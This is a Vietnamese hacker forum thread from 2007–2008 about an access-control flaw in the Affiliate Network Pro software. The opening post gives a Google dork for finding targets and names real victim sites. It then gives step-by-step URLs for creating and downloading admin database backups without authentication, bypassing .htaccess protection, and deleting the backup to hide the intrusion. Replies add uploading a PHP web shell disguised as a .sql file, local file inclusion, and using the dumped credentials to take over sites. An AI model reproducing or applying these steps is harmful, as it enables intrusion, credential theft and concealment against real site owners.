English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits Affiliate Network Pro, mới tinh  XML
  [Announcement]   Affiliate Network Pro, mới tinh 09/10/2007 11:01:30 (+0700) | #1 | 89597
hack2prison
Member
[Minus]    0    [Plus]
Joined: 10/02/2004 10:43:43
Messages: 58
Offline
[Profile] [PM]
Nguồn: http://www.securityfocus.com/archive/1/481206

Lâu rồi, chăm sóc vợ sắp đẻ nên H2P không tham gia forum. Hôm nay ngồi ngứa nghề tìm ra cái bug stupid nhưng khá nguy hiểm.
Cũng chẳng có gì cao siêu nên H2P mới gọi là stupid bug, nhưng vấn đề là khai thác toàn diện. Lòng vòng nhiều quá, ta vào cuộc:
google keyword: allinurl: "index.php?Act=Merchants" Kết quả kha khá nhỉ? Thử thay trang tìm kiếm khác và vài từ khóa khác tự nghĩ ra nhé, hỏi là tớ chửi cho đấy.
Thử thằng đầu tiên nhé: http://www.eduaffiliates.com/index.php?Act=Merchants

1. http://www.eduaffiliates.com/admin/dump
sẽ thấy backup-23-08-2007.sql cái gì đây, lol file backup của nó đấy.
Trong trường hợp thư mục được bảo vệ bằng 1 file index, .htaccess, nó chưa backup hoặc file backup đã quá cũ (ngày tháng năm backup nằm trong tên file ấy) mà mình muốn lấy file backup mới nhất thì sao.

2. Tạo file backup
- http://www.eduaffiliates.com/admin/backupstart.php
click vào nút Backup
a. Quay lại: http://www.eduaffiliates.com/admin/dump
sẽ thấy file backup-14-09-2007.sql là file ta vừa tạo ra (ngày 14-09-2007) get it.
b. Trong trường hợp thư mục được bảo vệ bằng 1 file index, bạn không thấy được thì làm sao download. Đơn giản: http://www.eduaffiliates.com/admin/dump/backup-dd-mm-yyyy.sql
thay ngày tháng năm theo giờ sever nhé.
c. Trong trường hợp thư mục được bảo vệ bằng 1 file .htaccess bạn sẽ nhận lỗi Forbiden, cũng đơn giản thôi http://www.eduaffiliates.com/admin/downloadbackup.php?fl=backup-dd-mm-yyyy.sql

3. Xóa dấu vết
Đây là bước quan trọng để admin không biết bị đột nhập: http://www.eduaffiliates.com/admin/deletebackup.php?fl=backup-dd-mm-yyyy.sql

Ghi chú: Trang eduaffiliates.com đã die, tìm trang khác để thực hành. Một vài trang đã fix, Còn khá nhiều trang dính đấy.
COMPLETED - H2P
[Up] [Print Copy]
  [Question]   Re: Affiliate Network Pro, mới tinh 09/10/2007 11:12:13 (+0700) | #2 | 89603
hack2prison
Member
[Minus]    0    [Plus]
Joined: 10/02/2004 10:43:43
Messages: 58
Offline
[Profile] [PM]
Bổ sung:
- Added by leo9x:
http://[site]/[path]/admin/backupstart.php
Upload len shell file dạng .php.sql sẽ run được trên nhiều server: http://[site]/[path]/admin/dump/file.php.sql
- Added by navaro:
http://[site]/[path]/admin/downloadbackup.php?fl=[filename] -->Local File Inclusion
[Up] [Print Copy]
  [Question]   Re: Affiliate Network Pro, mới tinh 27/10/2007 04:53:41 (+0700) | #3 | 93231
tomedison
Member
[Minus]    0    [Plus]
Joined: 02/01/2007 17:59:37
Messages: 9
Location: VN
Offline
[Profile] [PM] [WWW] [Yahoo!]
cảm ơn anh nhiều,quả là có rất nhiều site đã fix lỗi
em ngồi 1h mò được cái http://affiliate.taxliensecret.com,nó không được bảo vệ bởi file .htaccess,vào dễ như chỗ không người
[Up] [Print Copy]
  [Question]   Re: Affiliate Network Pro, mới tinh 30/10/2007 13:50:00 (+0700) | #4 | 93991
[Avatar]
 bonjovi288
Member
[Minus]    0    [Plus]
Joined: 03/09/2007 14:18:00
Messages: 2
Location: Metal
Offline
[Profile] [PM] [Email] [WWW] [Yahoo!]
Hic! Em ngu dốt lắm!
Cho em mạo muội xin phép hỏi các anh là: có đc file backup đó rồi thì mình đc gì & sẽ làm gì ạ ?
Mong các anh giúp đỡ kẻ ngu đần
[Up] [Print Copy]
  [Question]   Re: Affiliate Network Pro, mới tinh 02/11/2007 14:08:05 (+0700) | #5 | 94809
[Avatar]
 kid_b0d
Member
[Minus]    0    [Plus]
Joined: 16/08/2006 00:49:55
Messages: 70
Location: Phan thiết, Bình thu
Offline
[Profile] [PM] [WWW]

bonjovi288 wrote:
Hic! Em ngu dốt lắm!
Cho em mạo muội xin phép hỏi các anh là: có đc file backup đó rồi thì mình đc gì & sẽ làm gì ạ ?
Mong các anh giúp đỡ kẻ ngu đần 

Em cũng ngu nhưng cũng reply anh cái này hen smilie ( cái này mình biết sơ sơ à).
Những dynamic website thường có 1 data center chuyên quản lý về những xuất nhập của các câu lệnh SQL , và như thế những thông tin liên quan đến admin ( cứ cho là ngưởi điều hành cao nhất trong 1 website) , và những thông tin cá nhân quan trọng nhất nhưng chưa cần thiết phải cần đến ở giai đoạn này smilie được save vào file backup.sql , ta download để tìm user và passwd.
khi có user và passwd admin rùi thì bạn login vào để thành admin và làm gì website bạn thik smilie (nhưng không dễ ăn như vậy đâu ) .
[Up] [Print Copy]
  [Question]   Re: Affiliate Network Pro, mới tinh 18/07/2008 11:35:33 (+0700) | #6 | 142075
XBinLadeNX
Member
[Minus]    0    [Plus]
Joined: 14/07/2008 00:01:29
Messages: 1
Offline
[Profile] [PM]
Up con shell dạng .sql lên rùi làm sao chạy được nó vậy các bro?
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|